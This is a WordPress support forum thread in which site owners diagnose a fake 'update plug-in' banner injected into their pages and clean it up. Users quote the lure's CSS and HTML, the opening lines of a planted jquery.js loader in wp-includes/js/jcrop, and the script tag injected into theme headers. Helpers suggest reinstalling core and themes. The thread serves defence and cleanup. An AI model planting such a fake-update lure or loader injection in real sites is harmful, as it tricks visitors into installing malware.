• mica123

    (@mica123)


    I apologise if this question has been asked before – I searched for it everywhere. When I view our website, there is a warning at the top of every page:
    “WARNING! Please update plug-in to continue – Update now”
    This message appears in all the browsers and all the computers I tried.

    Everything is up to date. I found this line of the code in Firebug:
    <style>
    #hdplayerb { background: none repeat scroll 0 0 #FBECAD; border-bottom: 1px solid #999999; color: #111111; font-family: Verdana,Geneva,sans-serif; font-size: 13px; height: 35px; line-height: 20px; margin: 0; min-width: 910px; padding: 0; position: fixed; top: -40px; width: 100%; z-index: 2147483647; } #hdplayerb div.message { background: url(“data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAAUCAYAAABvVQZ0AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAIGNIUk0AAG2YAABzjgAA+WQAAIVlAAB0RQAA7/YAADAfAAAU56AoLTwAAAQvSURBVHjahJJrTFNnGMefZF9MTExMFpJ9WmQXKLPQcakYExHmuIVLa1vanl7OOW1PaQaoE1m31Y110SmC1lWYu4TgZC6LwClSKBbYBbKEjM1sCTrFLWPM4OI4vbCB2J7TPPtQWsum24df/ue8z/v+3vOe5wUhPAaP4tpM9+blxcuPrAsh/4MM+WHDixCO59rSCFD6CjZL9HREvP2ZleG+dwpj4TEQwn5I5MNYnxBHCF2BWNgP302dS8vLFS/tLMxDaYEEW14m3cJ6PZmpz0lZopBCaHEMKFLDKvZVo0pZM3Hte//mh80TQqMpOQrALfTD4tynGwoR7gp0uU8wNEWgveWAS1ieSi5IEFzo/9cYnH//VaUoMz0iykyPZGZsE7JET0V2SCV3ZLUVX5NGDdapaifkNXsnVfLiieLdeTczM7YJosz0iJms6uODPhBCo8AHfcAHfQBdZxzMDqkEUynaXYhyWSXSFIEqZQ3uKdqJBfnZWJCfjdKCHJQW5KD9cL0rLvM9kHW6jjC1NeWoVFSjRi1HjVqOhFaBNEWglSGRpgjUqOUol1WiUlGNSkU1ymor8OTx15rjohEQQnEpnOlwvKQjlGiidUmsDIm2ehpt9TTWWym0MiQyFiNaGRJNtA4N+jp0dbzRJIRG1mVxoPuD44Rep/IecRzG5kMNSWFC9k8YixEN+jo80Eh/yAeHoetUI3Os1eS4c+siwMKtcRj3s5LY/dtbIqu3t7a3OZv/T2jQ12FlxQtXS/ZIb4q3P7uSLc5YMZNVfcCHxkH4awb4oBf44DBc/WYkjaaI/5RRpBblskosKd6VZG/JrusQ+PUzWLj+MQhBL/CBIRhh3y00GtRoonVoMRuQsRix3kolRYmm2Fv2u/y+/lyblerVqOX+0+3OJjjUVNeVKxEFz3Y02PouOEr3ycomCa1iQ0NSj2026ZGmCLzQ45YLf85AaGlu64+z00/cX54FaHU0HpUW5GDu889hfp4YS18sQh2hRFs91dvpbmNOdxxtspgNaKJ1aDbp0WI2IEVq8dRJx8FoYBD4oA+i4S8hGrgM8NG5Y/rqqlIsLyvG8rJiVClrkKYI9rdffkiL3ZuD2L2fHvt8zCNOfF2im6/bG9r4wCCkAsPse4WEVoF6nQpJowYpUov2lv0uPugHnvMAz3lg9ttLWyhSm/yPBn0d2qz63ijnAT4wCFHOA1HOAzD9Vc+TOkLpTey8fuP9X3hPZPEBD6wsXgKbRd2berFJowa1apmP59j1DVngORbgj/khONX+9kFnq93pbLXjW2++gi3NDe5xr1vCB1i4+/MnIK8tnzTRBDpb7c5OdxvT031WPTx0sZAPsBDlWOADcSAaGAJh9QbE1uY3pSKEpyDKDQAf8EIs8vvjscjdtNja/CZh9QYIK7MgLE/H6xwLUW4AotwA/D0ACvlYFv1THvsAAAAASUVORK5CYII=”) no-repeat scroll 10px 5px rgba(0, 0, 0, 0); float: left; height: 20px; margin: 0; padding: 7px 25px 35px 35px; text-align: left; } #hdplayerb div.download a { text-decoration: none; } #hdplayerb div.download { float: left; padding: 3px 0 0; width: 200px; } #hdplayerb div.close { float: right; padding: 6px 10px 0 0; width: 16px; cursor: pointer; } #hdplayerb input.dl_button { background-color: #F4F5F5; background-image: linear-gradient(to bottom, #F4F5F5, #DFDDDD); border: 1px solid #4E4F4F; border-radius: 3px; color: #000000; display: inline-block; font-family: arial,helvetica,sans-serif; font-size: 12px; font-weight: bold; line-height: 12px; padding: 5px; text-decoration: none; } #hdplayerb input.dl_button:hover { background-color: #D9DDDD; background-image: linear-gradient(to bottom, #D9DDDD, #C6C3C3); border: 1px solid #4E4F4F; cursor: pointer; }
    </style>
    <div id=”hdplayerb” style=”top: 0px; opacity: 1;”>
    <div class=”message”>
    WARNING! Please update plug-in to continue
    </div>
    <div class=”close”>X</div>
    <div class=”download”>

    <input id=”ClickHere” class=”dl_button” type=”button” name=”submit” value=”Update NOW”>

    </div>

    I searched for this code or anything linked to this code in all the WordPress files and came up empty. There is nothing like that there. I also search for anything related to hdplayerb on the Internet and found nothing. Would anyone be able to point me in the right direction?
    Also, in Firebug, I can’t find the file that is related to this style –
    all it shows is the website’s url with this number after this: https://www.xxxx.xxx #3
    Thanking you in advance.

Viewing 15 replies - 1 through 15 (of 22 total)
  • jack randall

    (@theotherlebowski)

    you may have been hacked (or be collateral damage from something that someone else on the same server has done). talk to your hosting and see if they can see any malware on their machine…

    Thread Starter mica123

    (@mica123)

    Thank you very much. I did talk to my hosting provider, but they did not offer much help. However, the only reference to hdplayerb I found is in this folder:
    wp-includes/js/jcrop – jquery.js
    This folder normally contains three files as far as I can tell:
    Jcrop.gif
    jquery.Jcrop.min.css
    jquery.Jcrop.min.js

    The jquery.js is the fourth file in this folder – there is a lot of text there – I am just copying the first lines:
    /*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license

    */

    (function() { if (document.cookie.indexOf(“visited”) < 0) { if (!window.jQuery) { var script = document.createElement(“SCRIPT”); script.src =

    I am not sure if I should delete it – I am worried about ruining the site.
    Many thanks.

    jack randall

    (@theotherlebowski)

    ok, back to basics ??

    what version of wordpress are you using?
    what plugins do you have installed? (active and deactivated)
    what theme are you using?

    Thread Starter mica123

    (@mica123)

    Actually I found a possible link to the code. I use WordPress 4, theme responsive, plugins Cookie Law, Widget Logic, User roles.

    I downloaded the Responsive theme and compared it to the version we have and here is the result – in the header.php of the installed version of the theme there is this line:
    <script type=”text/javascript” src=”https://www.xxxx.xxxx/wp-includes/js/jcrop/jquery.js”></script><div id=”container” class=”hfeed”>

    I found this line in the header of both the parent and child theme. So, would you say that I delete this line and delete the additional jquery.js file in the crop folder?
    I should add that this line is not in the version I downloaded for comparison.

    jack randall

    (@theotherlebowski)

    delete responsive from your site, upload the latest version of responsive and see if that makes a difference. i’ve just checked the latest version or responsive and it’s not got that code in it so yeah, i think that could be a problem…

    Thread Starter mica123

    (@mica123)

    OK, I reinstalled WordPress, downloaded Responsive, deleted the line of code in the child theme and everything seems to be OK now. Many thanks.
    I do have another question: one of the plugins I have is User Role Editor. I have it for users who can edit the files, but they need an additional capability to work with a plugin such as Meteor slides – the WordPress default editor role is not suitable. However, I have never had a problem with my other WordPress sites which I manage myself without any additional users as editors. I wonder if this plugin would cause this kind of infection – it happened on one other site I manage – it got infected as well. I never experienced any infections, so this makes me wonder. What do you think?

    jack randall

    (@theotherlebowski)

    that user roles plugin should be fine, it’s more likely a theme that’s adding or deleting css to the body class. just make sure you’re really thorough checking who can do what when you set their roles in that plugin, a tick in the wrong box and joe public could do anything to your site!

    Thread Starter mica123

    (@mica123)

    Many thanks for this. I just don’t understand what you mean by “a theme that’s adding or deleting css to the body class”. Dou think it’s the responsive theme that’s the culprit? I checked that line of code in previous versions and it’s not there. Your input is very much appreciated.

    jack randall

    (@theotherlebowski)

    the user role plugin doesn’t have any real front facing effect on the site, it doesn’t make any changes to how the site actually looks so it’s not likely to be thing that’s writing extra css classes to the body tag.

    themes on the other hand do. if the new version of responsive that you’ve uploaded and activated hasn’t created the original problem, plus it’s a new installation of wordpress, you should be fine from here on. just keep the core up to date, make sure all plugins and themes are compatible with your version of wordpress and make regular back-ups of your site just in case anything goes really, really wrong down the line ??

    Thread Starter mica123

    (@mica123)

    Many thanks!

    I had the same issue. It looks like malware. Not sure if it is from a plugin that I installed or my provider or something more sinister.

    /wp-includes/js/jcrop on my site had these files in even after I had done an online upgrade to 4.1

    323B 24 Nov 2013 Jcrop.gif
    2.1K 24 Nov 2013 jquery.Jcrop.min.css
    16K 24 Nov 2013 jquery.Jcrop.min.js
    14K 24 Nov 2013 jquery.js

    Freshly downloaded WP 4.1 looks like this:

    323B 2 Jan 18:17 Jcrop.gif
    2.1K 2 Jan 18:17 jquery.Jcrop.min.css
    16K 2 Jan 18:17 jquery.Jcrop.min.js

    I deleted the directory then did an re-install from via the dashboard panel to get the good version and I think that has cured it.

    I’ll be keeping and eye on it to see if it changed back again. My WP instance has been running for years with different plugins on and off so it is difficult to diagnose where the badness came from. If you do a Google search for:

    wordpress “WARNING! Please update plug-in to continue”

    You get a list of potentially compromised sites.

    Thread Starter mica123

    (@mica123)

    Yes, I had the same experience. I would still like to know how my site got compromised. It seems that nobody really knows. Some of my sites never got hacked, but two of them did – so it is not very good if this happens out of the blue – in spite of strong passwords and so on.

    Thread Starter mica123

    (@mica123)

    Correction: I’ve just checked the site I cleaned up before and the same warning appeared again. I am really frustrated as I have to clean it up all again.

    jack randall

    (@theotherlebowski)

    there’s a possibility that if you’re on a shared server environment it might be that a site that is nothing to do with you has been hacked or compromised somehow and the effect is spreading to other sites, including yours, on the same server.

    can you list ALL of the plugins you’re using, even the inactive ones?

    Thread Starter mica123

    (@mica123)

    Well, I went through the files again and found that this line:
    <script type=”text/javascript” src=”https://www.xxxx.xxxx/wp-includes/js/jcrop/jquery.js”></script><div id=”container” class=”hfeed”>

    was included in the header of the child theme again although I deleted it before. However, I found the same line in all headers of the Twenty themes which had the instruction to include it in all headers. So I deleted all the Twenty thems and I sincerely hope that this will be the end of the matter.
    The plugins I have:
    Akismet (inactive), Fast Secure contact Form, Meteor Slides, Simple Social Icons, User Role Editor.
    Many thanks.

Viewing 15 replies - 1 through 15 (of 22 total)
  • The topic ‘Strange warning message – update plugin’ is closed to new replies.